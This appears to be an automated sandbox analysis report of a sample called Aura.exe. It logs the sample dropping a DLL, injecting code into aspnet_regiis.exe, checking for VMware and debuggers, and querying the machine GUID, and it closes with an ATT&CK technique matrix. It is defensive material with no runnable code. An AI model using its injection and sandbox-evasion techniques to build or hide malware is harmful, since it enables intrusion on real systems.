    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Aura.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: Aura.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Users\user\Desktop\Aura.PDB source: Aura.exe, 00000000.00000002.2367346591.000000000077A000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Aura.exe, 00000000.00000002.2367587213.0000000000B41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb, Cg source: Aura.exe, 00000000.00000002.2367587213.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Aura.exe, 00000000.00000002.2367587213.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: WERC939.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Windows\mscorlib.pdbP source: Aura.exe, 00000000.00000002.2367587213.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WERC939.tmp.dmp.6.dr
    Source: Binary string: n0C:\Windows\mscorlib.pdb source: Aura.exe, 00000000.00000002.2367346591.000000000077A000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WERC939.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Windows\mscorlib.pdb@ source: Aura.exe, 00000000.00000002.2367587213.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\Aura.exeUnpacked PE file: 0.2.Aura.exe.330000.0.unpack $;3F&L:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
    Source: Aura.exeStatic PE information: section name: $;3F&L
    Source: Aura.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_003369B6 push eax; iretd 0_2_003369BB
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_003371FE push esp; iretd 0_2_00337208
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_00336FFC push esp; iretd 0_2_00337002
    Source: Aura.exeStatic PE information: section name: $;3F&L entropy: 7.999725121175837
    Source: C:\Users\user\Desktop\Aura.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: Yara matchFile source: Process Memory Space: Aura.exe PID: 2836, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: 2750000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: 5D70000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: 5EA0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: 6EA0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: 71F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: 81F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 6516Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\SIHClient.exe TID: 2412Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
    Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
    Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC4FD2 FindFirstFileExW,0_2_6CDC4FD2
    Source: Amcache.hve.6.drBinary or memory string: VMware
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: aspnet_regiis.exe, 00000003.00000003.2070154688.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.00000000029FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8-
    Source: aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000002.2612119697.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2220130489.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2611620582.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2219902536.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2220763050.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2221132911.0000029D859A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: SIHClient.exe, 00000008.00000002.2612119697.0000029D85958000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2611620582.0000029D85958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: SIHClient.exe, 00000008.00000002.2612119697.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2220130489.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2611620582.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2219902536.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2220763050.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2221132911.0000029D859A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-6258
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-6241
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-6352
    Source: C:\Users\user\Desktop\Aura.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027BFAC0 LdrInitializeThunk,3_2_027BFAC0
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC491A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDC491A
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC48E9 mov eax, dword ptr fs:[00000030h]0_2_6CDC48E9
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC3715 mov eax, dword ptr fs:[00000030h]0_2_6CDC3715
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC64FC GetProcessHeap,0_2_6CDC64FC
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC491A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDC491A
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC1AB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CDC1AB1
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC1F8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDC1F8A
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\Aura.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2780000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2780000 value starts with: 4D5AJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2780000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2781000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27C4000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27C7000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D8000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D9000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2781000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27C4000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27C7000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D8000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D9000Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2586008Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC2158 cpuid 0_2_6CDC2158
    Source: C:\Users\user\Desktop\Aura.exeQueries volume information: C:\Users\user\Desktop\Aura.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_6CDC1BD3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CDC1BD3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Windows Management Instrumentation
    1
    DLL Side-Loading
    311
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    4
    Virtualization/Sandbox Evasion
    LSASS Memory51
    Security Software Discovery
    Remote Desktop Protocol2
    Clipboard Data
    2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Disable or Modify Tools
    Security Account Manager4
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive13
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
    Process Injection
    NTDS1
